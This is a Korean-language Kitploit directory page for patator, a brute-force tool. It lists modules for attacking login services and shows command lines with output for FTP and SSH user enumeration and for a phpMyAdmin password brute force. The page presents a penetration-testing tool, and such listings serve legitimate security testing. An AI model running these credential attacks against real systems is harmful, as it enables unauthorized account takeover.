Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
patator — Patator는 모듈식 설계와 유연한 사용법을 갖춘 다목적 무차별 대입(brute-force) 도구입니다. | Kitploit
도구/GitHubGitHub/lanjelot/patator
Password CrackingPassword AttacksVulnerability AnalysisHash AnalysisInformation GatheringNetwork SecurityPenetration TestingAuthenticationDNS AnalysisHash Analysis #18위
3.9k829241년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Password Attacks #15위
Password Cracking #15위
GitHublanjelot/patator

patator

Patator는 모듈식 설계와 유연한 사용법을 갖춘 다목적 무차별 대입(brute-force) 도구입니다.

저장소 보기

Patator

Patator는 Hydra, Medusa, Ncrack, Metasploit 모듈 및 Nmap NSE 스크립트를 암호 추측 공격에 사용하면서 느낀 불편함에서 작성되었습니다. 또 다른 무차별 대입 도구를 만들지 않고 동일한 단점을 반복하지 않기 위해 다른 접근 방식을 선택했습니다. Patator는 Python으로 작성된 멀티스레드 도구로, 이전 도구들보다 더 신뢰할 수 있고 유연하게 설계되었습니다.

현재 다음 모듈을 지원합니다:```

  • ftp_login : Brute-force FTP
  • ssh_login : Brute-force SSH
  • telnet_login : Brute-force Telnet
  • smtp_login : Brute-force SMTP
  • smtp_vrfy : Enumerate valid users using the SMTP VRFY command
  • smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
  • finger_lookup : Enumerate valid users using Finger
  • http_fuzz : Brute-force HTTP/HTTPS
  • rdp_gateway : Brute-force RDP Gateway
  • ajp_fuzz : Brute-force AJP
  • pop_login : Brute-force POP
  • pop_passd : Brute-force poppassd (not POP3)
  • imap_login : Brute-force IMAP
  • ldap_login : Brute-force LDAP
  • dcom_login : Brute-force DCOM
  • smb_login : Brute-force SMB
  • smb_lookupsid : Brute-force SMB SID-lookup
  • rlogin_login : Brute-force rlogin
  • vmauthd_login : Brute-force VMware Authentication Daemon
  • mssql_login : Brute-force MSSQL
  • oracle_login : Brute-force Oracle
  • mysql_login : Brute-force MySQL
  • mysql_query : Brute-force MySQL queries
  • rdp_login : Brute-force RDP (NLA)
  • pgsql_login : Brute-force PostgreSQL
  • vnc_login : Brute-force VNC
  • dns_forward : Brute-force DNS
  • dns_reverse : Brute-force DNS (reverse lookup subnets)
  • ike_enum : Enumerate IKE transforms
  • snmp_login : Brute-force SNMPv1/2 and SNMPv3
  • unzip_pass : Brute-force the password of encrypted ZIP files
  • keystore_pass : Brute-force the password of Java keystore files
  • sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
  • umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
"Patator"라는 이름은 [이 링크](https://www.youtube.com/watch?v=9sF9fTALhVA)에서 비롯되었습니다.

Patator는 스크립트 키디 친화적이지 않습니다. 보고하기 전에 아래 내용, [DeepWiki](https://deepwiki.com/lanjelot/patator)와 [위키](https://github.com/lanjelot/patator/wiki)를 읽어주십시오.


이 프로젝트가 마음에 드신다면 기부해주세요! :)
<div align="center">

| PayPal | Bitcoin |
| -------- | ------- |
| [![paypal](https://assets.kitploit.com/production/public/readmes/41770/33a91bd6d378215fcd413c279aa88d48bda6c8b2ef7695892777c87de37de256.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=SB36VJH4EM5WG&lc=AU&item_name=lanjelot&item_number=patator&currency_code=AUD&bn=PP%2dDonationsBF%3abtn_donateCC_LG%2egif%3aNonHosted)| [![bitcoin](https://assets.kitploit.com/production/public/readmes/41770/9349e1e3f75560d374d325c7fc06112d696e30c4473bd72136e6084f7647dded.png)](https://raw.githubusercontent.com/lanjelot/patator/master/donate/bitcoin-address.txt) |

</div>

감사합니다! [@lanjelot](https://twitter.com/lanjelot)

## Install```
git clone https://github.com/lanjelot/patator.git
git clone https://github.com/danielmiessler/SecLists.git
docker build -t patator patator/
docker run -it --rm -v $PWD/SecLists/Passwords:/mnt patator dummy_test data=FILE0 0=/mnt/richelieu-french-top5000.txt

사용 예제

  • FTP : vsftpd/userlist에서 로그인이 거부된 사용자 열거``` $ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500 19:36:06 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 19:36 AEDT 19:36:06 patator INFO - 19:36:06 patator INFO - code size time | candidate | num | mesg 19:36:06 patator INFO - ----------------------------------------------------------------------------- 19:36:07 patator INFO - 230 17 0.002 | anonymous | 7 | Login successful. 19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful. 19:36:08 patator INFO - 530 18 1.000 | root | 1 | Permission denied. 19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied. 19:36:36 patator INFO - 530 18 1.000 | robert | 93 | Permission denied. ...
`vsftpd-3.0.2-9`를 대상으로 `CentOS 7.0-1406`에서 테스트됨.

* SSH : 시간 기반 사용자 열거```
$ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3
17:45:20 patator    INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 17:45 AEDT
17:45:20 patator    INFO -
17:45:20 patator    INFO - code  size    time | candidate                          |   num | mesg
17:45:20 patator    INFO - -----------------------------------------------------------------------------
17:45:30 patator    FAIL - xxx   41    10.001 | root                               |     1 | <class '__main__.TimeoutError'> timed out
17:45:34 patator    FAIL - xxx   41    10.000 | john                               |    23 | <class '__main__.TimeoutError'> timed out
17:45:37 patator    FAIL - xxx   41    10.000 | joe                                |    40 | <class '__main__.TimeoutError'> timed out
...

openssh-server 1:6.0p1-4+deb7u2에서 Debian 7.8에서 테스트됨.

  • HTTP : phpMyAdmin 로그인 무차별 대입 공격``` $ http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf 11:53:47 patator INFO - Starting Patator v0.7-beta (http://code.google.com/p/patator/) at 2014-08-31 11:53 EST 11:53:47 patator INFO - 11:53:47 patator INFO - code size:clen time | candidate | num | mesg 11:53:47 patator INFO - ----------------------------------------------------------------------------- 11:53:48 patator INFO - 200 49585:0 0.150 | root:p@ssw0rd | 26 | HTTP/1.1 200 OK 11:53:51 patator INFO - 200 13215:0 0.351 | root: | 72 | HTTP/1.1 200 OK ^C 11:53:54 patator INFO - Hits/Done/Skip/Fail/Size: 2/198/0/0/3000, Avg: 29 r/s, Time: 0h 0m 6s 11:53:54 patator INFO - To resume execution, pass --resume 15,15,15,16,15,36,15,16,15,40
Payload #72는 예상치 못한 오류 메시지로 인한 오탐이었습니다:```
$ grep AllowNoPassword /tmp/qsdf/72_200\:13215\:0\:0.351.txt
... class="icon ic_s_error" /> Login without a password is forbidden by configuration (see AllowNoPassword)</div><noscript>

phpMyAdmin 4.2.7.1에 대해 테스트됨.

도구 다운로드